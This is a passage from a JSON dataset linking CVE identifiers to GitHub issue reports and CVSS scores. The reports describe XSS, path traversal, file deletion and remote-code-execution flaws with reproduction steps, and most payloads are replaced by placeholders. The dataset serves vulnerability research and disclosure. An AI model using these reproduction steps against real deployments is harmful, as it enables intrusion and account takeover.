navigate to the URL FILETAG FILETAG Create a new pdf structure for either user or group (editing profile will also work) FILETAG With burpsuite proxy on, click on save. In burpsuite, replace the value of APITAG parameter to the path of image file, lets say APITAG for the icon file of vim and forward the request. FILETAG Now while exporting pdf for a user if that POC profile is selected, the exported pdf will have the vim logo image. FILETAG FILETAG We would have loved to fix these ourselves.... but _cries bcz of bad dev skills_.",
  79907. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  79908. "severity": "MEDIUM",
  79909. "baseScore": 4.8,
  79910. "impactScore": 2.7,
  79911. "exploitabilityScore": 1.7
  79912. },
  79913. {
  79914. "CVE_ID": "CVE-2022-24881",
  79915. "Issue_Url_old": "https://github.com/ballcat-projects/ballcat-codegen/issues/5",
  79916. "Issue_Url_new": "https://github.com/ballcat-projects/ballcat-codegen/issues/5",
  79917. "Repo_new": "ballcat-projects/ballcat-codegen",
  79918. "Issue_Created_At": "2022-04-25T07:01:20Z",
  79919. "description": "ballcat codegen template engine injection RCE. \u5df2\u4f7f\u7528wx\u8054\u7cfb~",
  79920. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79921. "severity": "CRITICAL",
  79922. "baseScore": 9.8,
  79923. "impactScore": 5.9,
  79924. "exploitabilityScore": 3.9
  79925. },
  79926. {
  79927. "CVE_ID": "CVE-2022-24890",
  79928. "Issue_Url_old": "https://github.com/nextcloud/spreed/issues/7048",
  79929. "Issue_Url_new": "https://github.com/nextcloud/spreed/issues/7048",
  79930. "Repo_new": "nextcloud/spreed",
  79931. "Issue_Created_At": "2022-03-24T08:52:02Z",
  79932. "description": "Connection can not be established without camera permission. How to use APITAG Please use the \ud83d\udc4d reaction URLTAG to show that you are affected by the same issue. Please don't comment if you have no relevant information to add. It's just extra noise for everyone subscribed to this issue. Subscribe to receive notifications on status change and new comments. Steps to reproduce NUMBERTAG As user A create a room with group NUMBERTAG where user B is a member of NUMBERTAG As user A set custom permissions for user B only change to remove the camera permission NUMBERTAG As user A start a call NUMBERTAG As user B try to join the call Expected behaviour User B can join and talk Actual behaviour User B is disconnecting and connecting all the time Talk app Talk app version: master Custom Signaling server configured: no Custom TURN server configured: no Custom STUN server configured: no Browser Microphone available: yes using fake stream Camera available: yes using fake stream Operating system: Ubuntu Browser name: Firefox Browser version NUMBERTAG Browser log FILETAG",
  79933. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  79934. "severity": "MEDIUM",
  79935. "baseScore": 4.3,
  79936. "impactScore": 1.4,
  79937. "exploitabilityScore": 2.8
  79938. },
  79939. {
  79940. "CVE_ID": "CVE-2022-24900",
  79941. "Issue_Url_old": "https://github.com/onlaj/Piano-LED-Visualizer/issues/350",
  79942. "Issue_Url_new": "https://github.com/onlaj/piano-led-visualizer/issues/350",
  79943. "Repo_new": "onlaj/piano-led-visualizer",
  79944. "Issue_Created_At": "2022-04-28T20:25:57Z",
  79945. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the value parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. References OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  79946. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  79947. "severity": "HIGH",
  79948. "baseScore": 8.6,
  79949. "impactScore": 4.0,
  79950. "exploitabilityScore": 3.9
  79951. },
  79952. {
  79953. "CVE_ID": "CVE-2022-24902",
  79954. "Issue_Url_old": "https://github.com/PaulleDemon/tkVideoPlayer/issues/3",
  79955. "Issue_Url_new": "https://github.com/paulledemon/tkvideoplayer/issues/3",
  79956. "Repo_new": "paulledemon/tkvideoplayer",
  79957. "Issue_Created_At": "2022-04-29T17:24:07Z",
  79958. "description": "Huge memory usage even on small files.",
  79959. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  79960. "severity": "MEDIUM",
  79961. "baseScore": 4.3,
  79962. "impactScore": 1.4,
  79963. "exploitabilityScore": 2.8
  79964. },
  79965. {
  79966. "CVE_ID": "CVE-2022-24961",
  79967. "Issue_Url_old": "https://github.com/portainer/portainer/issues/6420",
  79968. "Issue_Url_new": "https://github.com/portainer/portainer/issues/6420",
  79969. "Repo_new": "portainer/portainer",
  79970. "Issue_Created_At": "2022-01-19T03:36:29Z",
  79971. "description": "Added behavior for Edge agents to reject connections if not connected to within NUMBERTAG hrs. If an agent is running for more than NUMBERTAG days, and is not associated with a Portainer instance by then, it should start rejecting any incoming connections. This mechanism does not apply when using agent secret. [EE NUMBERTAG",
  79972. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79973. "severity": "CRITICAL",
  79974. "baseScore": 9.8,
  79975. "impactScore": 5.9,
  79976. "exploitabilityScore": 3.9
  79977. },
  79978. {
  79979. "CVE_ID": "CVE-2022-25013",
  79980. "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/284",
  79981. "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/284",
  79982. "Repo_new": "gamonoid/icehrm",
  79983. "Issue_Created_At": "2021-12-23T08:13:20Z",
  79984. "description": "Reflected XSS vulnerabilities NUMBERTAG in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description DOM XSS in FILETAG GET parameter key . The input to key GET parameter is unsanitized as required for the context (javascript context ), and gets reflected in the DOM. Proof of Concept Occurrence NUMBERTAG Request param key Request: CODETAG Follow the link : URLTAG URLTAG to test this vulnerability on the live demo version of the website. Occurence NUMBERTAG Request param fm The payload passed fm gets sanitized by PHP code. This could be bypassed by adding an extra GET param content with the value HTML . Thus backend will not sanitize any user input. ERRORTAG Follow the link : URLTAG URLTAG to test this vulnerability on the live demo version of the website. Impact This vulnerability is capable of script execution on the victim's browser. Cookies cannot be stealed since the user needs to be logged out for this page/attack to work. References URLTAG URLTAG Occurrences NUMBERTAG HTML sanitization can be bypassed with an extra APITAG GET param URLTAG URLTAG NUMBERTAG URLTAG URLTAG",
  79985. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79986. "severity": "MEDIUM",
  79987. "baseScore": 6.1,
  79988. "impactScore": 2.7,
  79989. "exploitabilityScore": 2.8
  79990. },
  79991. {
  79992. "CVE_ID": "CVE-2022-25014",
  79993. "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/283",
  79994. "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/283",
  79995. "Repo_new": "gamonoid/icehrm",
  79996. "Issue_Created_At": "2021-12-23T08:09:18Z",
  79997. "description": "Reflected XSS vulnerability NUMBERTAG in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description The input sent to GET parameter m gets reflected in a script generated in the page, and isn't sanitized properly, leading to a Reflected XSS vulnerability. You can try adding the payload APITAG into the URL bar for m parameter, in any of the pages in APITAG post login to see this in action. The server is taking in the content of parameter 'm', and generates the following script in the response enclosed within APITAG tags : ERRORTAG The APITAG parameter has the value passed in through m , which is unsanitized & gets reflected in the page. Proof of Concept NUMBERTAG login to the demo dashboard at FILETAG NUMBERTAG Follow the link : URLTAG URLTAG Impact A malicious actor can craft a link that when clicked by any user logged in (admin or normal user) can cause a Reflected XSS attack. This could lead to the leak of session credentials. Occurences URLTAG URLTAG",
  79998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79999. "severity": "MEDIUM",
  80000. "baseScore": 6.1,
  80001. "impactScore": 2.7,
  80002. "exploitabilityScore": 2.8
  80003. },
  80004. {
  80005. "CVE_ID": "CVE-2022-25015",
  80006. "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/285",
  80007. "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/285",
  80008. "Repo_new": "gamonoid/icehrm",
  80009. "Issue_Created_At": "2021-12-23T08:15:18Z",
  80010. "description": "Stored XSS vulnerability in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description APITAG website fails to effectively filter html tags present in user input. This can cause malicious input sent by a logged in user to be stored on the database. This can lead to account takeover through cookie stealing of any other user who logs into the system, no other user interation is require. As an example, here we will demonstrate Proof of Concept NUMBERTAG Login as any user into the dashboard NUMBERTAG Send the following payload, meant for updating the 'first name' of the logged in user. You'll have to replace the PHPSESSID , with the session ID of any valid logged in (less privileged) user . ERRORTAG NUMBERTAG Login into the 'admin' account & Go to the following page where the name of the less privileged user gets displayed APITAG > Users' . You'll be able to see the alert box with session cookie of 'admin' user. The extra added APITAG request parameter causes the backend to ignore sanitization of user input. Impact A less privileged user can take over 'admin' account by stealing the session cookie. Occurrences URLTAG URLTAG User input sanitization is not done if the 'content' parameter is set to 'HTML'",
  80011. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80012. "severity": "MEDIUM",
  80013. "baseScore": 5.4,
  80014. "impactScore": 2.7,
  80015. "exploitabilityScore": 2.3
  80016. },
  80017. {
  80018. "CVE_ID": "CVE-2022-25023",
  80019. "Issue_Url_old": "https://github.com/adamstark/AudioFile/issues/58",
  80020. "Issue_Url_new": "https://github.com/adamstark/audiofile/issues/58",
  80021. "Repo_new": "adamstark/audiofile",
  80022. "Issue_Created_At": "2022-02-08T12:21:52Z",
  80023. "description": "Bug]heap buffer overflow in function APITAG Description A heap buffer overflow was discovered in function APITAG The issue is being triggered in function APITAG Version Version NUMBERTAG d URLTAG APITAG commit) Environment Ubuntu NUMBERTAG bit Reproduce Command APITAG program ERRORTAG POC file at the bottom of this report. ASAN Report FILETAG FILETAG POC POC URLTAG Any issue plz contact with me: EMAILTAG OR: twitter: APITAG",
  80024. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80025. "severity": "HIGH",
  80026. "baseScore": 8.8,
  80027. "impactScore": 5.9,
  80028. "exploitabilityScore": 2.8
  80029. },
  80030. {
  80031. "CVE_ID": "CVE-2022-25044",
  80032. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2142",
  80033. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2142",
  80034. "Repo_new": "espruino/espruino",
  80035. "Issue_Created_At": "2022-02-08T12:58:50Z",
  80036. "description": "stack buffer overflow APITAG in APITAG Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  80037. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80038. "severity": "HIGH",
  80039. "baseScore": 7.8,
  80040. "impactScore": 5.9,
  80041. "exploitabilityScore": 1.8
  80042. },
  80043. {
  80044. "CVE_ID": "CVE-2022-25045",
  80045. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/6",
  80046. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/6",
  80047. "Repo_new": "vivekpanday12/cve-",
  80048. "Issue_Created_At": "2022-02-09T09:00:10Z",
  80049. "description": "Home Owners Collection Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Home Owners Collection Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Exploit Author: VIVEK PANDAY Vendor Homepage: FILETAG Software Link: FILETAG Tested on Windows NUMBERTAG Linkedln Contact: URLTAG Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from FILETAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.",
  80050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80051. "severity": "CRITICAL",
  80052. "baseScore": 9.8,
  80053. "impactScore": 5.9,
  80054. "exploitabilityScore": 3.9
  80055. },
  80056. {
  80057. "CVE_ID": "CVE-2022-25050",
  80058. "Issue_Url_old": "https://github.com/merbanan/rtl_433/issues/1960",
  80059. "Issue_Url_new": "https://github.com/merbanan/rtl_433/issues/1960",
  80060. "Repo_new": "merbanan/rtl_433",
  80061. "Issue_Created_At": "2022-01-24T12:23:29Z",
  80062. "description": "Responsible disclosure policy. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
  80063. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  80064. "severity": "MEDIUM",
  80065. "baseScore": 5.5,
  80066. "impactScore": 3.6,
  80067. "exploitabilityScore": 1.8
  80068. },
  80069. {
  80070. "CVE_ID": "CVE-2022-25069",
  80071. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2990",
  80072. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2990",
  80073. "Repo_new": "marktext/marktext",
  80074. "Issue_Created_At": "2022-02-07T17:22:39Z",
  80075. "description": "Security issue: DOM based XSS & RCE from pasting vulnerable HTML. APITAG Description An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS. ERRORTAG The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script. URLTAG APITAG [x] Can you reproduce the issue? APITAG Steps to reproduce APITAG NUMBERTAG Copy the vulnerable HTML code ERRORTAG NUMBERTAG Paste it into Mark Text app Expected behavior: APITAG HTML should be sanitized before pasted into DOM. Actual behavior: APITAG No HTML sanitize procedure. Only checks if it's wrapped with APITAG or not. Link to an example: [optional] FILETAG FILETAG APITAG Versions APITAG version: APITAG Operating system: Windows NUMBERTAG APITAG Kali Linux APITAG",
  80076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  80077. "severity": "CRITICAL",
  80078. "baseScore": 9.6,
  80079. "impactScore": 6.0,
  80080. "exploitabilityScore": 2.8
  80081. },
  80082. {
  80083. "CVE_ID": "CVE-2022-25104",
  80084. "Issue_Url_old": "https://github.com/ttimot24/HorizontCMS/issues/43",
  80085. "Issue_Url_new": "https://github.com/ttimot24/horizontcms/issues/43",
  80086. "Repo_new": "ttimot24/horizontcms",
  80087. "Issue_Created_At": "2022-02-13T12:28:51Z",
  80088. "description": "Arbitrary file download vulnerability. APITAG NUMBERTAG beta APITAG updated on NUMBERTAG Submit date NUMBERTAG APITAG file download vulnerability FILETAG POC\uff1a APITAG FILETAG",
  80089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80090. "severity": "HIGH",
  80091. "baseScore": 7.5,
  80092. "impactScore": 3.6,
  80093. "exploitabilityScore": 3.9
  80094. },
  80095. {
  80096. "CVE_ID": "CVE-2022-25139",
  80097. "Issue_Url_old": "https://github.com/nginx/njs/issues/451",
  80098. "Issue_Url_new": "https://github.com/nginx/njs/issues/451",
  80099. "Repo_new": "nginx/njs",
  80100. "Issue_Created_At": "2021-12-24T06:48:19Z",
  80101. "description": "Heap UAF in njs_await_fulfilled. Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
  80102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80103. "severity": "CRITICAL",
  80104. "baseScore": 9.8,
  80105. "impactScore": 5.9,
  80106. "exploitabilityScore": 3.9
  80107. },
  80108. {
  80109. "CVE_ID": "CVE-2022-25220",
  80110. "Issue_Url_old": "https://github.com/1modm/petereport/issues/35",
  80111. "Issue_Url_new": "https://github.com/1modm/petereport/issues/35",
  80112. "Repo_new": "1modm/petereport",
  80113. "Issue_Created_At": "2022-02-07T20:21:47Z",
  80114. "description": "Security Issue Stored XSS (markdown). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG allows an authenticated admin user to inject persistent javascript code inside the markdown descriptions while creating a product, report or finding. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Click on APITAG Product NUMBERTAG Insert the following APITAG inside the product description. APITAG NUMBERTAG Click on APITAG Product NUMBERTAG If a user visits the product and click on the link in the description the Javascript code will be rendered. Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
  80115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80116. "severity": "MEDIUM",
  80117. "baseScore": 4.8,
  80118. "impactScore": 2.7,
  80119. "exploitabilityScore": 1.7
  80120. },
  80121. {
  80122. "CVE_ID": "CVE-2022-25229",
  80123. "Issue_Url_old": "https://github.com/popcorn-official/popcorn-desktop/issues/2491",
  80124. "Issue_Url_new": "https://github.com/popcorn-official/popcorn-desktop/issues/2491",
  80125. "Repo_new": "popcorn-official/popcorn-desktop",
  80126. "Issue_Created_At": "2022-04-26T20:46:04Z",
  80127. "description": "Popcorn Time NUMBERTAG SS to RCE. Our security team found a security issue inside Popcorn Time NUMBERTAG We have reserved the CVETAG to refer to this issue. Attached below is the link to our responsible disclosure policy. URLTAG Bug description Popcorn Time NUMBERTAG has a Stored XSS in the APITAG field via the settings page. The APITAG configuration is set to on which allows the webpage to use APITAG features, an attacker can leverage this to run OS commands. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Open the Popcorn time application NUMBERTAG Go to settings NUMBERTAG Enable Show advanced settings NUMBERTAG Scroll down to the APITAG section NUMBERTAG Insert the following APITAG inside the APITAG field and click on Check for updates . APITAG NUMBERTAG Scroll down to the Database section and click on Export database NUMBERTAG The application will create a APITAG file with the current configuration NUMBERTAG Send the configuration to the victim NUMBERTAG The victim must go to APITAG and click on Import Database NUMBERTAG When the victim restarts the application the XSS will be triggered and will run the calc command. Screenshots and files FILETAG System Information Version: Popcorn Time NUMBERTAG Operating System: Windows NUMBERTAG N/A Build NUMBERTAG Installer: Popcorn Time NUMBERTAG win NUMBERTAG Setup.exe",
  80128. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80129. "severity": "MEDIUM",
  80130. "baseScore": 5.4,
  80131. "impactScore": 2.7,
  80132. "exploitabilityScore": 2.3
  80133. },
  80134. {
  80135. "CVE_ID": "CVE-2022-25301",
  80136. "Issue_Url_old": "https://github.com/metabench/jsgui-lang-essentials/issues/1",
  80137. "Issue_Url_new": "https://github.com/metabench/jsgui-lang-essentials/issues/1",
  80138. "Repo_new": "metabench/jsgui-lang-essentials",
  80139. "Issue_Created_At": "2021-12-13T10:20:18Z",
  80140. "description": "Prototype pollution in function jsgui lang APITAG jsgui lang essentials runs the risk of prototype contamination when using inherited attributes in the function APITAG the risk locate is in here URLTAG",
  80141. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80142. "severity": "CRITICAL",
  80143. "baseScore": 9.8,
  80144. "impactScore": 5.9,
  80145. "exploitabilityScore": 3.9
  80146. },
  80147. {
  80148. "CVE_ID": "CVE-2022-25407",
  80149. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/21",
  80150. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/21",
  80151. "Repo_new": "kishan0725/hospital-management-system",
  80152. "Issue_Created_At": "2022-02-13T15:55:55Z",
  80153. "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter doctor.. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: APITAG Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: APITAG FILETAG FILETAG Proof of concept APITAG APITAG APITAG",
  80154. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80155. "severity": "MEDIUM",
  80156. "baseScore": 5.4,
  80157. "impactScore": 2.7,
  80158. "exploitabilityScore": 2.3
  80159. },
  80160. {
  80161. "CVE_ID": "CVE-2022-25408",
  80162. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/22",
  80163. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/22",
  80164. "Repo_new": "kishan0725/hospital-management-system",
  80165. "Issue_Created_At": "2022-02-13T15:57:12Z",
  80166. "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter dpassword.. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'dpassword' parameter to xss payload: APITAG Steps to exploit NUMBERTAG Navigate to FILETAG NUMBERTAG click APITAG Doctors ', use burpsuite to insert xss payload in the \"dpassword\" parameter NUMBERTAG Click APITAG Doctors\" FILETAG FILETAG Proof of concept APITAG",
  80167. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80168. "severity": "MEDIUM",
  80169. "baseScore": 5.4,
  80170. "impactScore": 2.7,
  80171. "exploitabilityScore": 2.3
  80172. },
  80173. {
  80174. "CVE_ID": "CVE-2022-25409",
  80175. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/20",
  80176. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/20",
  80177. "Repo_new": "kishan0725/hospital-management-system",
  80178. "Issue_Created_At": "2022-02-13T15:53:58Z",
  80179. "description": "Persistent cross site scripting (XSS) targeted towards web admin through FILETAG at via the parameter demail.. Persistent cross site scripting (XSS) in Hospital Management System NUMBERTAG targeted towards web admin through FILETAG at via the parameter demail. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'demail' parameter to xss payload: APITAG FILETAG FILETAG Proof of concept APITAG APITAG APITAG",
  80180. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80181. "severity": "MEDIUM",
  80182. "baseScore": 5.4,
  80183. "impactScore": 2.7,
  80184. "exploitabilityScore": 2.3
  80185. },
  80186. {
  80187. "CVE_ID": "CVE-2022-25410",
  80188. "Issue_Url_old": "https://github.com/maxsite/cms/issues/485",
  80189. "Issue_Url_new": "https://github.com/maxsite/cms/issues/485",
  80190. "Repo_new": "maxsite/cms",
  80191. "Issue_Created_At": "2022-02-17T16:01:55Z",
  80192. "description": "Stored Cross Site Scripting (XSS)(authenticated NUMBERTAG Stored Cross Site Scripting (XSS NUMBERTAG a stored cross site scripting (XSS) in maxsite cms targeted towards web admin through PATHTAG at via the parameter f_file_description NUMBERTAG Navigate to admin page, go to URLTAG update a FILETAG file FILETAG NUMBERTAG insert xss payload APITAG in the parameter f_file_description FILETAG NUMBERTAG click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time APITAG payload gets executed successfully and we'll get a pop up. FILETAG",
  80193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80194. "severity": "MEDIUM",
  80195. "baseScore": 5.4,
  80196. "impactScore": 2.7,
  80197. "exploitabilityScore": 2.3
  80198. },
  80199. {
  80200. "CVE_ID": "CVE-2022-25411",
  80201. "Issue_Url_old": "https://github.com/maxsite/cms/issues/487",
  80202. "Issue_Url_new": "https://github.com/maxsite/cms/issues/487",
  80203. "Repo_new": "maxsite/cms",
  80204. "Issue_Created_At": "2022-02-17T17:15:18Z",
  80205. "description": "Remote Code Execution Vulnerability In APITAG CMS NUMBERTAG Description of Vulnerability The arbitrary file deletion vulnerability URLTAG can delete PATHTAG and then in /admin/options add the types of files allowed to be uploaded, it will allows hacker to bypass the protection system protection upload malicious php files and execute malicious php code,eventually leading to a command execution vulnerability Proof of concept APITAG NUMBERTAG in PATHTAG a zagruzki add 'php' in \" \u0420\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u044b\u0435 \u0442\u0438\u043f\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a\" FILETAG NUMBERTAG Use the method of URLTAG to delete PATHTAG FILETAG NUMBERTAG upload php files whice containing malicious code: APITAG FILETAG NUMBERTAG open the php file PATHTAG then rce FILETAG",
  80206. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80207. "severity": "CRITICAL",
  80208. "baseScore": 9.8,
  80209. "impactScore": 5.9,
  80210. "exploitabilityScore": 3.9
  80211. },
  80212. {
  80213. "CVE_ID": "CVE-2022-25412",
  80214. "Issue_Url_old": "https://github.com/maxsite/cms/issues/486",
  80215. "Issue_Url_new": "https://github.com/maxsite/cms/issues/486",
  80216. "Repo_new": "maxsite/cms",
  80217. "Issue_Created_At": "2022-02-17T16:55:54Z",
  80218. "description": "Multiple Arbitrary File Deletion vulnerabilities. Description of Vulnerability Multiple Arbitrary File Deletion vulnerabilities in maxsite cms NUMBERTAG targeted towards web admin through PATHTAG at the parameter dir and deletefile affected source code: at NUMBERTAG in PATHTAG FILETAG when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Proof of concept APITAG NUMBERTAG in URLTAG select file to delete and Send the request directly through burp FILETAG FILETAG NUMBERTAG APITAG can traverse the directory to delete any file FILETAG NUMBERTAG APITAG APITAG Additional The same problem occurs in PATHTAG at the parameter f_check_files",
  80219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  80220. "severity": "HIGH",
  80221. "baseScore": 8.1,
  80222. "impactScore": 5.2,
  80223. "exploitabilityScore": 2.8
  80224. },
  80225. {
  80226. "CVE_ID": "CVE-2022-25462",
  80227. "Issue_Url_old": "https://github.com/bbuhrow/avx-ecm/issues/1",
  80228. "Issue_Url_new": "https://github.com/bbuhrow/avx-ecm/issues/1",
  80229. "Repo_new": "bbuhrow/avx-ecm",
  80230. "Issue_Created_At": "2022-01-18T02:39:11Z",
  80231. "description": "There are some bugs in this avx ecm.. FILETAG I merge all dependences of yafu. When I want to factor this number. I will receive segment falut. >> APITAG Following text is the message from gdb. CODETAG",
  80232. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80233. "severity": "HIGH",
  80234. "baseScore": 7.5,
  80235. "impactScore": 3.6,
  80236. "exploitabilityScore": 3.9
  80237. },
  80238. {
  80239. "CVE_ID": "CVE-2022-25464",
  80240. "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/255",
  80241. "Issue_Url_new": "https://github.com/doramart/doracms/issues/255",
  80242. "Repo_new": "doramart/doracms",
  80243. "Issue_Created_At": "2022-02-19T12:51:51Z",
  80244. "description": "There is a stored xss vulnerability exists in APITAG FILETAG Step NUMBERTAG enter the JS code < script > alert NUMBERTAG APITAG in the template, as shown in the following figure. FILETAG FILETAG Step NUMBERTAG after saving the changes, visit ERRORTAG HTML and index HTML, trigger JS code execution pop up window. FILETAG FILETAG",
  80245. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80246. "severity": "MEDIUM",
  80247. "baseScore": 4.8,
  80248. "impactScore": 2.7,
  80249. "exploitabilityScore": 1.7
  80250. },
  80251. {
